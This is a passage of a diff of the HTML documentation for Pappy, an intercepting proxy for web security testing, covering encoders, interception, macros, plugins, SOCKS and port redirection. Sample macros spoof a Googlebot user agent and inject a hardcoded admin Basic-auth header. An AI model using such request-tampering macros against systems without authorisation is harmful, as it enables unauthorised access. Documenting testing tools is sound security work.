<td><code class="docutils literal"><span class="pre">base64_decode</span></code>, <code class="docutils literal"><span class="pre">b64d</span></code></td>
<td>Base64 decode a string</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">base64_encode</span></code></td>
<td><code class="docutils literal"><span class="pre">base64_encode</span></code>, <code class="docutils literal"><span class="pre">b64e</span></code></td>
<td>Base64 encode a string</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">asciihex_decode</span></code></td>
<td><code class="docutils literal"><span class="pre">asciihex_decode</span></code>, <code class="docutils literal"><span class="pre">ahd</span></code></td>
<td>Decode an ASCII hex string</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">asciihex_encode</span></code></td>
<td><code class="docutils literal"><span class="pre">asciihex_encode</span></code>, <code class="docutils literal"><span class="pre">ahe</span></code></td>
<td>Encode an ASCII hex string</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">html_decode</span></code></td>
<td><code class="docutils literal"><span class="pre">html_decode</span></code>, <code class="docutils literal"><span class="pre">htmld</span></code></td>
<td>Decode an html encoded string</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">html_encode</span></code></td>
<td><code class="docutils literal"><span class="pre">html_encode</span></code>, <code class="docutils literal"><span class="pre">htmle</span></code></td>
<td>Encode a string to html encode all of the characters</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">url_decode</span></code></td>
<td><code class="docutils literal"><span class="pre">url_decode</span></code>, <code class="docutils literal"><span class="pre">urld</span></code></td>
<td>Url decode a string</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">url_encode</span></code></td>
<td><code class="docutils literal"><span class="pre">url_encode</span></code>, <code class="docutils literal"><span class="pre">urle</span></code></td>
<td>Url encode a string</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">gzip_decode</span></code></td>
<td><code class="docutils literal"><span class="pre">gzip_decode</span></code>, <code class="docutils literal"><span class="pre">gzd</span></code></td>
<td>Gzip decompress a string. Probably won&#8217;t work too well since there&#8217;s not a great way to get binary data passed in as an argument. I&#8217;m working on this.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">gzip_encode</span></code></td>
<td><code class="docutils literal"><span class="pre">gzip_encode</span></code>, <code class="docutils literal"><span class="pre">gze</span></code></td>
<td>Gzip compress a string. Result doesn&#8217;t get copied to the clipboard.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">base64_decode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">base64_decode_raw</span></code>, <code class="docutils literal"><span class="pre">b64dr</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">base64_decode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">base64_encode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">base64_encode_raw</span></code>, <code class="docutils literal"><span class="pre">b64er</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">base64_encode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">asciihex_decode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">asciihex_decode_raw</span></code>, <code class="docutils literal"><span class="pre">ahdr</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">asciihex_decode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">asciihex_encode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">asciihex_encode_raw</span></code>, <code class="docutils literal"><span class="pre">aher</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">asciihex_encode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">html_decode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">html_decode_raw</span></code>, <code class="docutils literal"><span class="pre">htmldr</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">html_decode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">html_encode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">html_encode_raw</span></code>, <code class="docutils literal"><span class="pre">htmler</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">html_encode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">url_decode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">url_decode_raw</span></code>, <code class="docutils literal"><span class="pre">urldr</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">url_decode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">url_encode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">url_encode_raw</span></code>, <code class="docutils literal"><span class="pre">urler</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">url_encode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">gzip_decode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">gzip_decode_raw</span></code>, <code class="docutils literal"><span class="pre">gzdr</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">gzip_decode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">gzip_encode_raw</span></code></td>
<td><code class="docutils literal"><span class="pre">gzip_encode_raw</span></code>, <code class="docutils literal"><span class="pre">gzer</span></code></td>
<td>Same as <code class="docutils literal"><span class="pre">gzip_encode</span></code> but will not print a hexdump if it contains non-printable characters. It is suggested you use <code class="docutils literal"><span class="pre">&gt;</span></code> to redirect the output to a file.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">unixtime_decode</span></code></td>
<td><code class="docutils literal"><span class="pre">unixtime_decode</span></code>, <code class="docutils literal"><span class="pre">uxtd</span></code></td>
<td>Take in a unix timestamp and print a human readable timestamp</td>
</tr>
</tbody>
</table>
</div>
<div class="section" id="interceptor">
<h2>Interceptor<a class="headerlink" href="#interceptor" title="Permalink to this headline"></a></h2>
<p>This feature is like Burp&#8217;s proxy with &#8220;Intercept Mode&#8221; turned on,
@ -823,7 +1153,7 @@ default to <code class="docutils literal"><span class="pre">vi</span></code>.</p
</tr>
</tbody>
</table>
<div class="highlight-python"><div class="highlight"><pre>Intercept both requests and responses:
<div class="highlight-python"><div class="highlight"><pre><span></span>Intercept both requests and responses:
&gt; ic requests responses
&gt; ic req rsp
@ -901,7 +1231,7 @@ make automated requests through the proxy and save them to the data
file. A macro file is any python script file in the current directory
that is in the form <code class="docutils literal"><span class="pre">macro_&lt;name&gt;.py</span></code>. An example project directory
with macros would be:</p>
<div class="highlight-python"><div class="highlight"><pre>$ ls -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ ls -l
-rw-r--r-- 1 scaryhacker wheel 150 Nov 26 11:17 config.json
-rw------- 1 scaryhacker wheel 2639872 Nov 26 17:18 data.db
-rw-r--r-- 1 scaryhacker wheel 471 Nov 26 18:42 macro_blank.py
@ -914,15 +1244,15 @@ with macros would be:</p>
<code class="docutils literal"><span class="pre">test</span></code> macro. A macro script is any python script that defines a
<code class="docutils literal"><span class="pre">run_macro(args)</span></code> function and a <code class="docutils literal"><span class="pre">MACRO_NAME</span></code> variable. For example,
a simple macro would be:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">### macro_print.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">### macro_print.py</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Print Macro&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Print Macro&#39;</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="k">if</span> <span class="n">args</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, </span><span class="si">%s</span><span class="s">!&quot;</span> <span class="o">%</span> <span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">print</span> <span class="s2">&quot;Hello, </span><span class="si">%s</span><span class="s2">!&quot;</span> <span class="o">%</span> <span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, Pappy!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, Pappy!&quot;</span>
</pre></div>
</div>
<p>You can place this macro in your project directory then load and run it
@ -930,7 +1260,7 @@ from Pappy. When a macro is run, arguments are passed from the command
line. Arguments are separated the same way as they are on the command
line, so if you want to use spaces in your argument, you have to put
quotes around it.</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy
Proxy is listening on port 8000
pappy&gt; lma
Loaded &quot;&lt;Macro Test Macro (tm/test)&gt;&quot;
@ -955,7 +1285,7 @@ function will be run when it the macro gets loaded.</p>
<h3>Generating Macros From Requests<a class="headerlink" href="#generating-macros-from-requests" title="Permalink to this headline"></a></h3>
<p>You can also generate macros that have Pappy <code class="docutils literal"><span class="pre">Request</span></code> objects created
with the same information as requests you&#8217;ve already made. For example:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy
Proxy is listening on port 8000
pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
@ -1286,18 +1616,18 @@ can fix it.</p>
requests in macros. It&#8217;s worth pointing out that <code class="docutils literal"><span class="pre">request_by_id</span></code> is
useful for passing request objects as arguments. For example, here is a
macro that lets you resubmit a request with the Google Bot user agent:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## macro_googlebot.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## macro_googlebot.py</span>
<span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span><span class="p">,</span> <span class="n">request_by_id</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="kn">from</span> <span class="nn">pappyproxy.iter</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Submit as Google&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Submit as Google&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">req</span> <span class="o">=</span> <span class="n">request_by_id</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">req</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s">&#39;User-Agent&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s">&quot;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot;</span>
<span class="n">req</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">&#39;User-Agent&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s2">&quot;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot;</span>
<span class="n">req</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="n">req</span><span class="o">.</span><span class="n">save</span><span class="p">()</span>
</pre></div>
@ -1351,24 +1681,24 @@ which generates a deferred, then generate a deferred from
used twisted before, please don&#8217;t try. Twisted is hard. Plus the mangled
request will be saved before it is submitted anyways.</p>
<p>Confusing? Here are some example intercepting macros:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## int_cloud2butt.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## int_cloud2butt.py</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Cloud to Butt&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Cloud to Butt&#39;</span>
<span class="k">def</span> <span class="nf">mangle_response</span><span class="p">(</span><span class="n">request</span><span class="p">):</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">r</span><span class="o">.</span><span class="n">raw_data</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">raw_data</span><span class="p">,</span> <span class="s">&#39;cloud&#39;</span><span class="p">,</span> <span class="s">&#39;butt&#39;</span><span class="p">)</span>
<span class="n">r</span><span class="o">.</span><span class="n">raw_data</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">raw_data</span><span class="p">,</span> <span class="s">&#39;Cloud&#39;</span><span class="p">,</span> <span class="s">&#39;Butt&#39;</span><span class="p">)</span>
<span class="n">r</span><span class="o">.</span><span class="n">raw_data</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">raw_data</span><span class="p">,</span> <span class="s1">&#39;cloud&#39;</span><span class="p">,</span> <span class="s1">&#39;butt&#39;</span><span class="p">)</span>
<span class="n">r</span><span class="o">.</span><span class="n">raw_data</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">raw_data</span><span class="p">,</span> <span class="s1">&#39;Cloud&#39;</span><span class="p">,</span> <span class="s1">&#39;Butt&#39;</span><span class="p">)</span>
<span class="k">return</span> <span class="n">r</span>
</pre></div>
</div>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## int_donothing.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## int_donothing.py</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Do Nothing&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Do Nothing&#39;</span>
<span class="k">def</span> <span class="nf">mangle_request</span><span class="p">(</span><span class="n">request</span><span class="p">):</span>
<span class="k">return</span> <span class="n">request</span>
@ -1377,25 +1707,25 @@ request will be saved before it is submitted anyways.</p>
<span class="k">return</span> <span class="n">request</span><span class="o">.</span><span class="n">response</span>
</pre></div>
</div>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## int_adminplz.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## int_adminplz.py</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">base64encode</span> <span class="k">as</span> <span class="n">b64e</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Admin Session&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Admin Session&#39;</span>
<span class="k">def</span> <span class="nf">mangle_request</span><span class="p">(</span><span class="n">request</span><span class="p">):</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s">&#39;Authorization&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#39;Basic </span><span class="si">%s</span><span class="s">&#39;</span> <span class="o">%</span> <span class="n">b64e</span><span class="p">(</span><span class="s">&#39;Admin:Password123&#39;</span><span class="p">)</span>
<span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">&#39;Authorization&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;Basic </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="n">b64e</span><span class="p">(</span><span class="s1">&#39;Admin:Password123&#39;</span><span class="p">)</span>
<span class="k">return</span> <span class="n">r</span>
</pre></div>
</div>
<p>In addition, you can use an <code class="docutils literal"><span class="pre">init(args)</span></code> function to get arguments
from the command line. If no arguments are passed, args will be an empty
list. Here is an example macro that does a search and replace:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## int_replace.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## int_replace.py</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Find and Replace&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Find and Replace&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="n">runargs</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">init</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
@ -1420,7 +1750,7 @@ list. Here is an example macro that does a search and replace:</p>
<p>You can use this macro to do any search and replace that you want. For
example, if you wanted to replace &#8220;Google&#8221; with &#8220;Skynet&#8221;, you can run
the macro like this:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; lma
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;InterceptingMacro Find and Replace (replace)&gt;&quot;
pappy&gt; rim replace Google Skynet
&quot;Find and Replace&quot; started
@ -1522,6 +1852,10 @@ error checking.</p>
<td><code class="docutils literal"><span class="pre">export</span></code></td>
<td>Writes either the full request or response to a file in the current directory.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">merge</span> <span class="pre">&lt;dbfile&gt;</span></code></td>
<td><code class="docutils literal"><span class="pre">merge</span></code></td>
<td>Add all the requests from another datafile to the current datafile</td>
</tr>
</tbody>
</table>
<div class="section" id="response-streaming">
@ -1547,58 +1881,58 @@ scripts. Still, it may not be a bad idea to try building a macro to do
something in a quick and dirty way before writing a plugin since plugins
are more complicated to write.</p>
<p>A simple hello world plugin could be something like:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## hello.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;Hello, </span><span class="si">%s</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;ho&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;ho&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>You can also create commands which support autocomplete:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">shlex</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s">&#39;alice&#39;</span><span class="p">,</span> <span class="s">&#39;allie&#39;</span><span class="p">,</span> <span class="s">&#39;sarah&#39;</span><span class="p">,</span> <span class="s">&#39;mallory&#39;</span><span class="p">,</span> <span class="s">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;alice&#39;</span><span class="p">,</span> <span class="s1">&#39;allie&#39;</span><span class="p">,</span> <span class="s1">&#39;sarah&#39;</span><span class="p">,</span> <span class="s1">&#39;mallory&#39;</span><span class="p">,</span> <span class="s1">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;Hello, </span><span class="si">%s</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="k">def</span> <span class="nf">complete_hello_world</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">begidx</span><span class="p">,</span> <span class="n">endidx</span><span class="p">):</span>
<span class="k">return</span> <span class="p">[</span><span class="n">n</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">_AUTOCOMPLETE_NAMES</span> <span class="k">if</span> <span class="n">n</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="n">text</span><span class="p">)]</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Then when you run Pappy you can use the <code class="docutils literal"><span class="pre">hello</span></code> command:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy&gt; ho
@ -1627,6 +1961,104 @@ you can write out commands that you use regularly but may not be worth
creating a dedicated plugin for.</p>
</div>
</div>
<div class="section" id="global-settings">
<h2>Global Settings<a class="headerlink" href="#global-settings" title="Permalink to this headline"></a></h2>
<p>There are some settings that apply to Pappy as a whole and are stored in
<code class="docutils literal"><span class="pre">~/.pappy/global_config.json</span></code>. These settings are generally for tuning
performance or modifying behavior on a system-wide level. No information
about projects is put in here since it is world readable. You can
technically add settings in here for plugins that you write, but if it&#8217;s
at all possible, please keep settings in the normal project config.</p>
<p>Settings included in <code class="docutils literal"><span class="pre">~/.pappy/global_config.json</span></code>:</p>
<table border="1" class="docutils">
<colgroup>
<col width="8%" />
<col width="92%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Setting</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td>cache_size</td>
<td>The number of requests from history that will be included in memory at any given time. Set to -1 to keep everything in memory. See the request cache section for more info.</td>
</tr>
</tbody>
</table>
</div>
<div class="section" id="using-a-socks-server">
<h2>Using a SOCKS Server<a class="headerlink" href="#using-a-socks-server" title="Permalink to this headline"></a></h2>
<p>Pappy allows you to use an upstream SOCKS server. You can do this by
adding a <code class="docutils literal"><span class="pre">socks_proxy</span></code> value to config.json. You can use the following
for anonymous access to the proxy:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>&quot;socks_proxy&quot;: {&quot;host&quot;:&quot;socks.proxy.host&quot;, &quot;port&quot;:5555}
</pre></div>
</div>
<p>To use credentials you add a <code class="docutils literal"><span class="pre">username</span></code> and <code class="docutils literal"><span class="pre">password</span></code> value to the
dictionary:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>&quot;socks_proxy&quot;: {&quot;host&quot;:&quot;socks.proxy.host&quot;, &quot;port&quot;:5555, &quot;username&quot;: &quot;mario&quot;, &quot;password&quot;:&quot;ilovemushrooms&quot;}
</pre></div>
</div>
<p>Anything that passes through any of the active listeners will use the
proxy.</p>
</div>
<div class="section" id="transparent-host-redirection">
<h2>Transparent Host Redirection<a class="headerlink" href="#transparent-host-redirection" title="Permalink to this headline"></a></h2>
<p>Sometimes you get a frustrating thick client that doesnt let you mess
with proxy settings to get it to go through a proxy. However, if you can
redirect where it sends its traffic to localhost, you can get Pappy to
take that traffic and redirect it to go where it should.</p>
<p>It takes root permissions to listen on low numbered ports. As a result,
well need to do some root stuff to listen on ports 80 and 443 and get
the data to Pappy. There are two ways to get the traffic to Pappy. The
first is to set up port forwarding as root to send traffic from
localhost:80 to localhost:8080 and localhost:443 to localhost:8443
(since we can listen on 8080 and 8443 without root). Or you can YOLO,
run Pappy as root and just have it listen on 80 and 443.</p>
<p>According to Google you can use the following command to forward port 80
on localhost to 8080 on Linux:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>iptables -t nat -A PREROUTING -i ppp0 -p tcp --dport 80 -j REDIRECT --to-ports 8080
</pre></div>
</div>
<p>Then to route 443 to 8443:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>iptables -t nat -A PREROUTING -i ppp0 -p tcp --dport 443 -j REDIRECT --to-ports 8443
</pre></div>
</div>
<p>Of course, both of these need to be run as root.</p>
<p>Then on mac its</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>echo &quot;
rdr pass inet proto tcp from any to any port 80 -&gt; 127.0.0.1 port 8080
rdr pass inet proto tcp from any to any port 443 -&gt; 127.0.0.1 port 8443
&quot; | sudo pfctl -ef -
Then to turn it off on mac its
sudo pfctl -F all -f /etc/pf.conf
</pre></div>
</div>
<p>Then modify the listener settings in the projects config.json to be:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>&quot;proxy_listeners&quot;: [
{&quot;port&quot;: 8080, &quot;interface&quot;: &quot;127.0.0.1&quot;, &quot;forward_host&quot;: &quot;www.example.faketld&quot;},
